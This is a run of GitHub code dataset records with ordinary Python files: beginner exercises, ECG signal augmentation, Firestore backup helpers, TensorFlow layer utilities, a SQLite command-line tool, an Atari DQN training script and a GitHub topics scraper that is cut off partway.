[(1, 7), (1, 3), (3, 4, 5), (2, 2)] yields\n# [(2, 2), (1, 3), (3, 4, 5), (1, 7)]\n# Hint: use a custom key= function to extract the last element form each tuple.\ndef sort_last(tuples):\n\treturn sorted(tuples, key=lambda x: int(x[-1]))\n\ndef test(got, expected):\n\tif got == expected:\n\t\tprefix = ' OK '\n\telse:\n\t\tprefix = ' X '\n\n\tprint(f'{prefix} got: {got} expected: {expected}')\n\ndef main():\n\tprint('Match ends')\n\ttest(match_ends(['aba', 'xyz', 'aa', 'x', 'bbb']), 3)\n\ttest(match_ends(['', 'x', 'xy', 'xyx', 'xx']), 2)\n\ttest(match_ends(['aaa', 'be', 'abc', 'hello']), 1)\n\n\tprint('\\nfront_x')\n\ttest(front_x(['bbb', 'ccc', 'axx', 'xzz', 'xaa']),\n\t\t ['xaa', 'xzz', 'axx', 'bbb', 'ccc'])\n\ttest(front_x(['ccc', 'bbb', 'aaa', 'xcc', 'xaa']),\n\t\t ['xaa', 'xcc', 'aaa', 'bbb', 'ccc'])\n\ttest(front_x(['mix', 'xyz', 'apple', 'xanadu', 'aardvark']),\n\t\t ['xanadu', 'xyz', 'aardvark', 'apple', 'mix'])\n\n\tprint('\\nsort_last')\n\ttest(sort_last([(1, 3), (3, 2), (2, 1)]),\n\t\t [(2, 1), (3, 2), (1, 3)])\n\ttest(sort_last([(2, 3), (1, 2), (3, 1)]),\n\t\t [(3, 1), (1, 2), (2, 3)])\n\ttest(sort_last([(1, 7), (1, 3), (3, 4, 5), (2, 2)]),\n\t\t [(2, 2), (1, 3), (3, 4, 5), (1, 7)])\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"stemasoff/GooglePythonExercises","sub_path":"Basic/list1.py","file_name":"list1.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22384702270","text":"import os\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport cv2\n\n## get filename during run time\ndirname, filename = os.path.split(os.path.abspath(__file__))\nprint(\"running: {}\".format(filename) )\n## change directory to the current directory where code is saved\n\n \ndef add_noise_with_SNR(signal, noise_amount):\n \"\"\" \n adding noise\n noise amount limit 0.005 - 0.05 \"\"\"\n \n target_snr_db = noise_amount #20\n # Calculate signal power and convert to dB \n x_watts = signal ** 2\n# x_db = 10 * np.log10(x_watts)\n \n sig_avg_watts = np.mean(x_watts)\n sig_avg_db = 10 * np.log10(sig_avg_watts)\n # Calculate noise according to [2] then convert to watts\n noise_avg_db = sig_avg_db - target_snr_db\n noise_avg_watts = 10 ** (noise_avg_db / 10)\n # Generate an sample of white noise\n mean_noise = 0\n noise_volts = np.random.normal(mean_noise, np.sqrt(noise_avg_watts), len(x_watts))\n noised_signal = signal + noise_volts\n\n return noised_signal \n\ndef scaled(signal, factor):\n \"\"\"\"\n scale the signal\n scaling factor limit 0.2 - 2 \"\"\"\n scaled_signal = signal * factor\n return scaled_signal\n \n\ndef negate(signal):\n \"\"\" \n negate the signal \"\"\"\n negated_signal = signal * (-1)\n return negated_signal\n\n \ndef hor_filp(signal):\n \"\"\" \n flipped horizontally \"\"\"\n hor_flipped = np.flip(signal)\n return hor_flipped\n\n## permuted\n\ndef permute(signal, pieces):\n \"\"\" \n signal permutation\n number of pieces limit 2-20 \"\"\"\n pieces = int(np.ceil(np.shape(signal)[0]/(np.shape(signal)[0]//pieces)).tolist())\n piece_length = int(np.shape(signal)[0]//pieces)\n \n sequence = list(range(0,pieces))\n np.random.shuffle(sequence)\n \n permuted_signal = np.reshape(signal[:(np.shape(signal)[0]//pieces*pieces)], (pieces, piece_length)).tolist() + [signal[(np.shape(signal)[0]//pieces*pieces):]]\n permuted_signal = np.asarray(permuted_signal)[sequence]\n permuted_signal = np.hstack(permuted_signal)\n \n \n return permuted_signal\n\n \n## timewarping\n 
\ndef time_warp(signal, sampling_freq, pieces, stretch_factor, squeeze_factor):\n \"\"\" \n signal time warping: stretch and squeeze some part of the signal\n bellow is the best limit of the parameters\n slices should be factor of time_length\n stretch_factor = 1.2\n squeeze_factor = 1.2\n pieces = 6, 2, \n sampling_freq = 256 \"\"\"\n total_time = np.shape(signal)[0]//sampling_freq\n segment_time = total_time/pieces\n sequence = list(range(0,pieces))\n stretch = np.random.choice(sequence, math.ceil(len(sequence)/2), replace = False)\n squeeze = list(set(sequence).difference(set(stretch)))\n initialize = True\n for i in sequence:\n orig_signal = signal[int(i*np.floor(segment_time*sampling_freq)):int((i+1)*np.floor(segment_time*sampling_freq))]\n orig_signal = orig_signal.reshape(np.shape(orig_signal)[0],1)\n if i in stretch:\n output_shape = int(np.ceil(np.shape(orig_signal)[0]*stretch_factor))\n new_signal = cv2.resize(orig_signal, (1, output_shape), interpolation=cv2.INTER_LINEAR)\n if initialize == True:\n time_warped = new_signal\n initialize = False\n else:\n time_warped = np.vstack((time_warped, new_signal))\n elif i in squeeze:\n output_shape = int(np.ceil(np.shape(orig_signal)[0]*squeeze_factor))\n new_signal = cv2.resize(orig_signal, (1, output_shape), interpolation=cv2.INTER_LINEAR)\n if initialize == True:\n time_warped = new_signal\n initialize = False\n else:\n time_warped = np.vstack((time_warped, new_signal))\n return time_warped\n \n\n","repo_name":"pritamqu/SSL-ECGv2","sub_path":"codes/signal_transformation_task.py","file_name":"signal_transformation_task.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"27762873129","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.firestore import api_utils\n\n\ndef _GetBackupService():\n \"\"\"Returns the service for interacting with the Firestore Backup service.\"\"\"\n return api_utils.GetClient().projects_locations_backups\n\n\ndef ListBackups(project, location):\n \"\"\"Lists backups available to Google Cloud Firestore.\n\n Args:\n project: the project id to list backups, a string.\n location: the location to list backups, a string.\n\n Returns:\n a List of Backups.\n \"\"\"\n return list(\n _GetBackupService()\n .List(\n api_utils.GetMessages().FirestoreProjectsLocationsBackupsListRequest(\n parent='projects/{}/locations/{}'.format(project, location)\n )\n )\n .backups\n )\n\n\ndef GetBackup(project, location, backup):\n \"\"\"Gets backup with the given name.\n\n Args:\n project: the project id to get backup, a string.\n location: the location to get backup, a string.\n backup: the backup id to get backup, a string.\n\n Returns:\n A Backup.\n \"\"\"\n return _GetBackupService().Get(\n api_utils.GetMessages().FirestoreProjectsLocationsBackupsGetRequest(\n name='projects/{}/locations/{}/backups/{}'.format(\n project, location, backup\n )\n )\n )\n\n\ndef DeleteBackup(project, location, backup):\n \"\"\"Deletes backup with the given name.\n\n Args:\n project: the project id to get backup, a string.\n location: the location to get backup, a string.\n backup: the backup id to get backup, a string.\n\n Returns:\n Empty.\n \"\"\"\n\n return _GetBackupService().Delete(\n api_utils.GetMessages().FirestoreProjectsLocationsBackupsDeleteRequest(\n name='projects/{}/locations/{}/backups/{}'.format(\n project, location, backup\n )\n )\n 
)\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/api_lib/firestore/backups.py","file_name":"backups.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"4941757784","text":"import tensorflow as tf\nfrom functools import reduce\nfrom operator import mul\n\ndef assert_rank(tensor, expected_rank, name=None):\n \"\"\"Raises an exception if the tensor rank is not of the expected rank.\n\n Args:\n tensor: A tf.Tensor to check the rank of.\n expected_rank: Python integer or list of integers, expected rank.\n name: Optional name of the tensor for the error message.\n\n Raises:\n ValueError: If the expected shape doesn't match the actual shape.\n \"\"\"\n if name is None:\n name = tensor.name\n\n expected_rank_dict = {}\n if isinstance(expected_rank, six.integer_types):\n expected_rank_dict[expected_rank] = True\n else:\n for x in expected_rank:\n expected_rank_dict[x] = True\n\n actual_rank = tensor.shape.ndims\n if actual_rank not in expected_rank_dict:\n scope_name = tf.get_variable_scope().name\n raise ValueError(\n \"For the tensor `%s` in scope `%s`, the actual rank \"\n \"`%d` (shape = %s) is not equal to the expected rank `%s`\" %\n (name, scope_name, actual_rank, str(tensor.shape), str(expected_rank)))\n\ndef dropout(x, keep_prob, is_train, noise_shape=None, seed=None, name=None):\n \"\"\"\n with tf.name_scope(name or \"dropout\"):\n if is_train is None:\n if keep_prob < 1.0:\n return tf.nn.dropout(x, keep_prob, noise_shape=noise_shape, seed=seed)\n else:\n if keep_prob < 1.0:\n out = tf.cond(\n is_train,\n lambda: tf.nn.dropout(x, keep_prob, noise_shape=noise_shape, seed=seed),\n lambda: x\n )\n return out\n \"\"\"\n with tf.name_scope(name or \"dropout\"):\n if is_train is None:\n if keep_prob < 1.0:\n return tf.nn.dropout(x, keep_prob, noise_shape=noise_shape, seed=seed)\n else:\n if is_train and keep_prob < 1.0:\n return tf.nn.dropout(x, keep_prob, noise_shape=noise_shape, seed=seed)\n return x\n\ndef get_shape_list(tensor, expected_rank=None, name=None):\n \"\"\"Returns a list of the shape of tensor, preferring static dimensions.\n\n Args:\n tensor: A tf.Tensor object to find the shape of.\n expected_rank: (optional) int. The expected rank of `tensor`. If this is\n specified and the `tensor` has a different rank, and exception will be\n thrown.\n name: Optional name of the tensor for the error message.\n\n Returns:\n A list of dimensions of the shape of tensor. 
All static dimensions will\n be returned as python integers, and dynamic dimensions will be returned\n as tf.Tensor scalars.\n \"\"\"\n if name is None:\n name = tensor.name\n\n if expected_rank is not None:\n assert_rank(tensor, expected_rank, name)\n\n shape = tensor.shape.as_list()\n\n non_static_indexes = []\n for (index, dim) in enumerate(shape):\n if dim is None:\n non_static_indexes.append(index)\n\n if not non_static_indexes:\n return shape\n\n dyn_shape = tf.shape(tensor)\n for index in non_static_indexes:\n shape[index] = dyn_shape[index]\n return shape\n\ndef selu(x):\n with tf.name_scope('elu') as scope:\n alpha = 1.6732632423543772848170429916717\n scale = 1.0507009873554804934193349852946\n return scale * tf.where(x >= 0.0, x, alpha * tf.nn.elu(x))\n\ndef gelu(x): # read\n # return 0.5*x*(1+tf.tanh(math.sqrt(2/math.pi)*(x+0.044715*tf.pow(x, 3))))\n \"\"\"Gaussian Error Linear Unit.\n\n This is a smoother version of the RELU.\n Original paper: https://arxiv.org/abs/1606.08415\n\n Args:\n input_tensor: float Tensor to perform activation.\n\n Returns:\n `input_tensor` with the GELU activation applied.\n \"\"\"\n cdf = 0.5 * (1.0 + tf.erf(x / tf.sqrt(2.0)))\n return x * cdf\n\ndef swish(x):\n return x*tf.nn.sigmoid(x)\n\ndef activation_name_to_func(activation_name):\n assert isinstance(activation_name, str)\n if isinstance(activation_name, str):\n if activation_name == 'linear':\n act_fn = tf.identity\n elif activation_name == 'relu':\n act_fn = tf.nn.relu\n elif activation_name == 'elu':\n act_fn = tf.nn.elu\n elif activation_name == 'selu':\n act_fn = selu\n elif activation_name == 'sigmoid':\n act_fn = tf.nn.sigmoid\n elif activation_name == 'tanh':\n act_fn = tf.nn.tanh\n elif activation_name == 'exp':\n act_fn = tf.exp\n elif activation_name == 'log':\n act_fn = tf.log\n elif activation_name == 'gelu':\n act_fn = gelu\n elif activation_name == 'swish':\n act_fn = swish\n elif activation_name == 'lrelu':\n act_fn = tf.nn.leaky_relu\n else:\n raise AttributeError('no activation function named as %s' % activation_name)\n elif hasattr(activation_name, '__call__'): # callable\n act_fn = activation_name\n else:\n raise AttributeError\n return act_fn\n\ndef act_name2fn(afn):\n return activation_name_to_func(afn)\n\ndef bn_dense_layer_v2(\n input_tensor, hn, bias, bias_start=0.0, scope=None,\n activation='relu', enable_bn=False,\n wd=0., keep_prob=1.0, is_train=None, dup_num=1, merge_var=False\n):\n act_fn = act_name2fn(activation)\n with tf.variable_scope(scope or 'bn_dense_layer'):\n input_tensor = dropout(input_tensor, keep_prob, is_train)\n # the comment use a 3d tensor [bs,sl,hn] as a example\n input_shape = get_shape_list(input_tensor) # [3]\n assert len(input_shape) >= 2 # at least [bs,hn]\n # merge\n dims_merge = input_shape[:-1] # [all unrelated dims]\n new_dim = reduce(mul, dims_merge) # get the merged dim\n new_shape = [new_dim, input_shape[-1]] # new shape for matmul [2]\n input_tensor_rsp = tf.reshape(input_tensor, new_shape) # [xx,dim]\n\n # dense layer\n input_dim = new_shape[-1]\n if merge_var:\n weight = tf.get_variable('W', shape=[input_dim, hn * dup_num], dtype=tf.float32)\n else:\n weight_list = []\n for i in range(dup_num):\n weight_list.append(tf.get_variable('W_%d' % i, shape=[input_dim, hn]))\n weight = tf.concat(weight_list, -1)\n output_rsp = tf.matmul(input_tensor_rsp, weight)\n\n if bias:\n if merge_var or dup_num == 1:\n bias_val = tf.get_variable(\n 'bias', shape=[hn * dup_num], dtype=tf.float32,\n initializer=tf.constant_initializer(bias_start)\n )\n 
else:\n bias_list = []\n for i in range(dup_num):\n bias_list.append(\n tf.get_variable(\n 'bias_%d' % i, shape=[hn], dtype=tf.float32,\n initializer=tf.constant_initializer(bias_start))\n )\n bias_val = tf.concat(bias_list, -1)\n output_rsp += bias_val\n\n # output reshape\n output_shape = dims_merge + [hn * dup_num] # [3] for [bs,sl,new_hn]\n output = tf.reshape(output_rsp, output_shape) # [bs,sl,new_hn]\n\n if enable_bn:\n output = tf.contrib.layers.batch_norm(\n output, center=True, scale=True, is_training=is_train,\n updates_collections=None, decay=0.9,\n scope='bn')\n\n if wd:\n tf.add_to_collection('reg_vars', weight)\n\n return act_fn(output)","repo_name":"YangLi1221/CoRA","sub_path":"utilize.py","file_name":"utilize.py","file_ext":"py","file_size_in_byte":7612,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"12479611171","text":"\"\"\"\nYou are a professional robber planning to rob houses along a street. Each house has a certain amount of money stashed, the only constraint stopping you from robbing each of them is that adjacent houses have security system connected and it will automatically contact the police if two adjacent houses were broken into on the same night.\n\nGiven a list of non-negative integers representing the amount of money of each house, determine the maximum amount of money you can rob tonight without alerting the police.\n\n \n\nExample 1:\n\nInput: nums = [1,2,3,1]\nOutput: 4\nExplanation: Rob house 1 (money = 1) and then rob house 3 (money = 3).\n Total amount you can rob = 1 + 3 = 4.\nExample 2:\n\nInput: nums = [2,7,9,3,1]\nOutput: 12\nExplanation: Rob house 1 (money = 2), rob house 3 (money = 9) and rob house 5 (money = 1).\n Total amount you can rob = 2 + 9 + 1 = 12.\n \n\nConstraints:\n\n0 <= nums.length <= 100\n0 <= nums[i] <= 400\nAccepted\n653,391\nSubmissions\n1,530,733\n\nSolution : At each house, see if it is more profitable to rob it or not.\n This means dp[i] = max(dp[i-1], dp[i-2]+nums[i])\n Not rob, robbing current house\n \n Time complexity : O(N)\n Space complexity : O(N)\n\"\"\"\n\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n if not nums:\n return 0\n if len(nums) <= 2:\n return max(nums)\n dp = [0]*len(nums)\n \n for index, num in enumerate(nums):\n dp[index] = max(dp[index-1], dp[index-2] + num)\n return dp[-1]","repo_name":"jojojoseph94/lc-practice","sub_path":"dynamic-programming/House Robber.py","file_name":"House Robber.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72079091424","text":"def isValid(board):\n d = {}\n d['X'] = 0\n d['O'] = 0\n d['-'] = 0\n for i in board:\n for j in i:\n d[j] += 1\n if d['X'] - d['O'] > 1:\n return 'No'\n\n ct_X, ct_O = 0, 0\n for i in board:\n st = ''\n for j in i:\n st += j\n if st == 'XXX':\n ct_X += 1\n if st == 'OOO':\n ct_O += 1\n \n if board[0][0]+board[1][1] + board[2][2] == 'XXX':\n ct_X += 1\n if board[0][0]+board[1][1] + board[2][2] == 'OOO':\n ct_O += 1\n if board[0][2]+board[1][1] + board[2][0] == 'XXX':\n ct_X += 1\n if board[0][2]+board[1][1] + board[2][0] == 'OOO':\n ct_O += 1\n \n for i in range(3):\n st = ''\n for j in range(3):\n st += board[j][i]\n if st == 'XXX':\n ct_X += 1\n if st == 'OOO':\n ct_O += 1\n \n if (ct_O > 0 and ct_X > 0) or ct_X > 1 or ct_O > 1:\n return 'No'\n return 'Yes'\n\n\nboard = []\nfor _ in range(3):\n row = input()\n 
board.append(list(row))\n\nprint(isValid(board))\n","repo_name":"deadpool2794/python","sub_path":"SimpleGame.py","file_name":"SimpleGame.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20692606338","text":"# insertion sort algorithm\n\ndef insertion_sort(l):\n for i in range(1,len(l)):\n j=i-1\n key=l[i] \n while (j>=0) and (l[j]>key):\n l[j+1]=l[j]\n j-=1\n l[j+1]=key\n return l\n\nlista = []\nprint(\"Entre com 10 numeros reais e tenha eles organizados em ordem crescente\")\n\nfor n in range(0,10):\n while True:\n try:\n elemento = float(input(\"Digite o numero: \"))\n break\n except:\n continue\n lista.append(elemento)\n\nlista = insertion_sort(lista)\nprint(lista)","repo_name":"Monoclinico/Programas_Python_1","sub_path":"insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"9317212200","text":"import argparse\nimport logging\nimport os\nimport sys\nfrom db_util import dbmanip as db\nimport util.loggerinitializer as utl\n\n# Initialize log object\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nutl.initialize_logger(os.getcwd(), logger)\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"A tool to manipulate a SQLite DB\")\n\n subparsers = parser.add_subparsers(title='actions',\n description='valid actions',\n help='Use sqlite-python.py {action} -h for help with each action',\n dest='command'\n )\n\n parser_index = subparsers.add_parser('createdb', help='Create database and tables')\n\n parser_index.add_argument(\"--db\", dest='db', default=None, action=\"store\", help=\"The DB name\",\n required=True)\n\n parser_insert = subparsers.add_parser('insert', help='Insert data on tables')\n\n parser_insert.add_argument(\"--file\", default=None, action=\"store\", help=\"TSV file with the data to be inserted\",\n required=True)\n\n parser_insert.add_argument(\"--db\", default=None, action=\"store\", help=\"The DB name\",\n required=True)\n\n\n parser_update = subparsers.add_parser('update', help='Update a field in a db')\n\n parser_update.add_argument(\"--db\", default=None, action=\"store\", help=\"The DB name\",\n required=True)\n\n parser_update.add_argument(\"--a\", default=False, action=\"store\", help=\"assay\",\n required=False)\n\n parser_update.add_argument(\"--an\", default=False, action=\"store\", help=\"assay new\",\n required=False)\n\n parser_update.add_argument(\"--d\", default=False, action=\"store\", help=\"donor\",\n required=False)\n\n parser_update.add_argument(\"--dn\", default=False, action=\"store\", help=\"donor new\",\n required=False)\n\n\n\n parser_select = subparsers.add_parser('select', help='Select fields from the db')\n\n parser_select.add_argument(\"--db\", default=None, action=\"store\", help=\"The DB name\",\n required=True)\n\n parser_select.add_argument(\"--ct\", default=False, action=\"store_true\", help=\"Select all cell_types\",\n required=False)\n\n\n parser_select.add_argument(\"-a\", default=False, action=\"store\",\n help=\"Select all assays, track_name, track_type, track_density and date of a given chipseq with the defined assays\",\n required=False)\n\n parser_select.add_argument(\"-atn\", default=False, action=\"store\",\n help=\"Select track_name, and date of a given chipseq with the defined assay_track_name\",\n required=False)\n\n 
parser_select.add_argument(\"-ac\", default=False, action=\"store\",\n help=\"Select cell_type, and date of a given chipseq with the defined assay_cell\",\n required=False)\n\n\n parser_delete = subparsers.add_parser('delete', help='delete rows from the db')\n\n parser_delete.add_argument(\"-tn\", default=None, action=\"store\", help=\"Delete rows where this appears\",\n required=False)\n\n parser_delete.add_argument(\"--db\", default=None, action=\"store\", help=\"The DB name\",\n required=True)\n\n\n args = parser.parse_args()\n # print(args)\n\n # sys.exit()\n conn = db.connect_db(args.db, logger)\n\n if args.command == \"createdb\":\n\n db.create_table(conn, logger)\n\n\n elif args.command == \"insert\":\n list_of_data = []\n\n with open(args.file, 'r') as f:\n for line in f:\n\n # reset dictionary\n line_dict = dict()\n\n # Skip empty lines\n if not line.strip():\n continue\n if line.startswith(','):\n continue\n\n # split line\n values = line.strip().split(',')\n\n # put each field in a dict\n line_dict['cell_type_category'] = values[0]\n line_dict['cell_type'] = values[1]\n line_dict['cell_type_track_name'] = values[2]\n line_dict['cell_type_short'] = values[3]\n line_dict['assay_category'] = values[4]\n line_dict['assay'] = values[5]\n line_dict['assay_track_name'] = values[6]\n line_dict['assay_short'] = values[7]\n line_dict['donor'] = values[8]\n line_dict['time_point'] = values[9]\n line_dict['view'] = values[10]\n line_dict['track_name'] = values[11]\n line_dict['track_type'] = values[12]\n line_dict['track_density'] = values[13]\n line_dict['provider_institution'] = values[14]\n line_dict['source_server'] = values[15]\n line_dict['source_path_to_file'] = values[16]\n line_dict['server'] = values[17]\n line_dict['path_to_file'] = values[18]\n line_dict['new_file_name'] = values[19]\n\n\n #append the dict to a list\n list_of_data.append(line_dict)\n\n db.insert_data(conn, list_of_data, logger)\n\n\n elif args.command == \"update\" and args.a is not False:\n db.update_assay(conn, args.a, args.an, logger)\n\n elif args.command == \"update\" and args.d is not False:\n db.update_donor(conn, args.d, args.dn, logger)\n\n\n\n elif args.command == \"select\" and args.ct is not False:\n all_cell_types = db.select_cell_types(conn, logger)\n\n for cell_type in all_cell_types:\n print(cell_type[0])\n\n\n\n elif args.command == \"select\" and args.a is not False:\n all_assays = db.select_assays(conn, args.a, logger)\n\n print(\"\\n| track_name\\t| track_type\\t| track_density\")\n for assays in all_assays:\n print(\"|\",\"\\t| \".join(assays))\n\n\n elif args.command == \"select\" and args.atn is not False:\n all_assay_track_names = db.select_assay_track_names(conn, args.atn, logger)\n\n print(\"\\n| track_name\")\n for assay_track_name in all_assay_track_names:\n print(\"|\",\"\\t| \".join(assay_track_name))\n\n\n elif args.command == \"select\" and args.ac is not False:\n all_assay_cells = db.select_assay_cells(conn, args.ac, logger)\n\n print(\"\\n| cell_type\")\n for assay_cell in all_assay_cells:\n print(\"|\",\"\\t| \".join(assay_cell))\n\n\n elif args.command == \"delete\":\n db.delete_track_name(conn, args.tn, logger)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n","repo_name":"marianneoliveira93/curso-python","sub_path":"project_final/sqlite-python.py","file_name":"sqlite-python.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20120518507","text":"import argparse\nimport 
sys\n\nimport gym\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\n\nsys.path.append('../../')\nfrom agent import AtariAgent\nfrom model import AtariModel\nfrom replay_memory import Experience, ReplayMemory\n\nfrom rltoolkit.env.atari_wrappers import wrap_deepmind\nfrom rltoolkit.policy.modelfree.ddqn import DDQN\nfrom rltoolkit.policy.modelfree.dqn import DQN\nfrom rltoolkit.utils import logger, tensorboard\n\n# env params\nIMAGE_SIZE = (84, 84)\nCONTEXT_LEN = 4\nFRAME_SKIP = 4\n\n# model params\nUPDATE_TARGET_STEP = 2500\nMEMORY_SIZE = 1000000\nGAMMA = 0.99\nLR_START = 0.0003 # LR start\nTOTAL_STEP = 1000000\nMEMORY_WARMUP_SIZE = 50000\nUPDATE_FREQ = 4\nBATCH_SIZE = 32\n\n# eval params\nEVAL_RENDER = False\n\n\n# train an episode\ndef run_train_episode(agent, env, rpm):\n total_reward = 0\n obs = env.reset()\n step = 0\n loss_lst = []\n\n while True:\n step += 1\n context = rpm.recent_obs()\n context.append(obs)\n context = np.stack(context, axis=0)\n\n action = agent.sample(context)\n next_obs, reward, done, _ = env.step(action)\n rpm.append(Experience(obs, action, reward, done))\n\n # train model\n if (rpm.size() > MEMORY_WARMUP_SIZE) and (step % UPDATE_FREQ == 0):\n # s,a,r,s',done\n (batch_all_obs, batch_action, batch_reward,\n batch_done) = rpm.sample_batch(BATCH_SIZE)\n batch_obs = batch_all_obs[:, :CONTEXT_LEN, :, :]\n batch_next_obs = batch_all_obs[:, 1:, :, :]\n\n train_loss = agent.learn(batch_obs, batch_action, batch_reward,\n batch_next_obs, batch_done)\n loss_lst.append(train_loss)\n\n total_reward += reward\n obs = next_obs\n if done:\n break\n return total_reward, step, np.mean(loss_lst)\n\n\ndef run_evaluate_episodes(agent, env):\n obs = env.reset()\n while not env.get_real_done():\n action = agent.predict(obs)\n obs, _, done, _ = env.step(action)\n if EVAL_RENDER:\n env.render()\n if done:\n obs = env.reset()\n return np.mean(env.get_eval_rewards())\n\n\ndef main():\n env = gym.make(args.env)\n env = wrap_deepmind(\n env, dim=IMAGE_SIZE[0], framestack=False, obs_format='NCHW')\n test_env = gym.make(args.env)\n test_env = wrap_deepmind(\n test_env, dim=IMAGE_SIZE[0], obs_format='NCHW', test=True)\n\n # set seed\n torch.manual_seed(args.train_seed)\n torch.cuda.manual_seed_all(args.train_seed)\n env.seed(args.train_seed)\n test_env.seed(args.test_seed)\n\n device = torch.device(\n 'cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n rpm = ReplayMemory(MEMORY_SIZE, IMAGE_SIZE, CONTEXT_LEN)\n act_dim = env.action_space.n\n\n # get model\n model = AtariModel(act_dim, args.dueling)\n\n # get algorithm\n algo_name = args.algo\n if algo_name == 'DQN':\n alg = DQN(model, gamma=GAMMA, lr=LR_START, device=device)\n else:\n alg = DDQN(model, gamma=GAMMA, lr=LR_START, device=device)\n\n # get agent\n agent = AtariAgent(\n alg,\n act_dim=act_dim,\n total_step=TOTAL_STEP,\n update_target_step=UPDATE_TARGET_STEP,\n start_lr=LR_START,\n device=device)\n\n # start training, memory warm up\n with tqdm(\n total=MEMORY_WARMUP_SIZE, desc='[Replay Memory Warm Up]') as pbar:\n while rpm.size() < MEMORY_WARMUP_SIZE:\n total_reward, steps, _ = run_train_episode(agent, env, rpm)\n pbar.update(steps)\n\n test_flag = 0\n train_total_steps = args.train_total_steps\n pbar = tqdm(total=train_total_steps)\n cum_steps = 0 # this is the current timestep\n while cum_steps < train_total_steps:\n # start epoch\n total_reward, steps, loss = run_train_episode(agent, env, rpm)\n cum_steps += steps\n\n pbar.set_description('[train]exploration, learning rate:{}, {}'.format(\n agent.curr_ep, 
agent.alg.optimizer.param_groups[0]['lr']))\n tensorboard.add_scalar('{}/training_rewards'.format(algo_name),\n total_reward, cum_steps)\n tensorboard.add_scalar('{}/loss'.format(algo_name), loss,\n cum_steps) # mean of total loss\n tensorboard.add_scalar('{}/exploration'.format(algo_name),\n agent.curr_ep, cum_steps)\n\n pbar.update(steps)\n\n # perform evaluation\n if cum_steps // args.test_every_steps >= test_flag:\n while cum_steps // args.test_every_steps >= test_flag:\n test_flag += 1\n\n pbar.write('testing')\n eval_rewards_mean = run_evaluate_episodes(agent, test_env)\n\n logger.info(\n 'eval_agent done, (steps, eval_reward): ({}, {})'.format(\n cum_steps, eval_rewards_mean))\n\n tensorboard.add_scalar(\n '{}/mean_validation_rewards'.format(algo_name),\n eval_rewards_mean, cum_steps)\n\n pbar.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--env', help='name of the atari env', default='PongNoFrameskip-v4')\n parser.add_argument(\n '--algo',\n default='DQN',\n type=str,\n help='DQN/DDQN, represent DQN, double DQN respectively')\n parser.add_argument(\n '--dueling',\n default=False,\n type=bool,\n help='if True, represent dueling DQN or dueling DDQN')\n parser.add_argument(\n '--train_total_steps',\n type=int,\n default=int(1e7),\n help='maximum environmental steps of games')\n parser.add_argument(\n '--test_every_steps',\n type=int,\n default=100000,\n help='the step interval between two consecutive evaluations')\n parser.add_argument(\n '--train_seed',\n type=int,\n default=66166616,\n help='set the random seed for training environment')\n parser.add_argument(\n '--test_seed',\n type=int,\n default=666616,\n help='set the random seed for test and eval environment')\n\n args = parser.parse_args()\n main()\n","repo_name":"jianzhnie/deep-rl-toolkit","sub_path":"benchmark/dqn/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"7"} +{"seq_id":"1347893523","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport datetime\r\nimport pandas as pd\r\n\r\n# scraping the data of to 25 repositories of each trending topics\r\ngithub_topics_url = 'https://github.com/topics'\r\nr = requests.get(url = github_topics_url)\r\n# print(len(r.text)) \r\npage_content = r.text\r\n\r\n# # print(page_content[:1000])\r\n# with open('webpage.html', 'w') as f:\r\n# f.write(page_content[:10000])\r\n\r\nsoup1 = BeautifulSoup(page_content, 'html.parser')\r\nsoup= BeautifulSoup(soup1.prettify(), 'html.parser')\r\n\r\n# scraping topic title tags \r\ntitle_class =\"f3 lh-condensed mb-0 mt-1 Link--primary\"\r\ntopic_title_tags = soup.find_all('p',{'class' :title_class})\r\ntopic_title = []\r\nfor tag in topic_title_tags:\r\n topic_title.append(tag.text.strip( ))\r\n# print(topic_title)\r\n\r\n\r\n# scraping topic description\r\ndescp_class = \"f5 color-fg-muted mb-0 mt-1\"\r\ntopic_descp_tags= soup.find_all('p', {'class': descp_class})\r\ntopic_descp = []\r\nfor descp in topic_descp_tags:\r\n topic_descp.append(descp.text.strip( ))\r\n# print(topic_descp)\r\n\r\n\r\n# scraping topic links\r\nlink_class = \"no-underline flex-grow-0\"\r\ntopic_links_tags= soup.find_all('a', {'class': link_class})\r\ntopic_links = []\r\nbase_link = \"http://github.com\"\r\nfor link in topic_links_tags:\r\n topic_links.append(base_link+ link['href'].strip())\r\n# print(topic_links)\r\n\r\n# creating a dataframe to store it as a .csv file\r\ntopics_dict = 
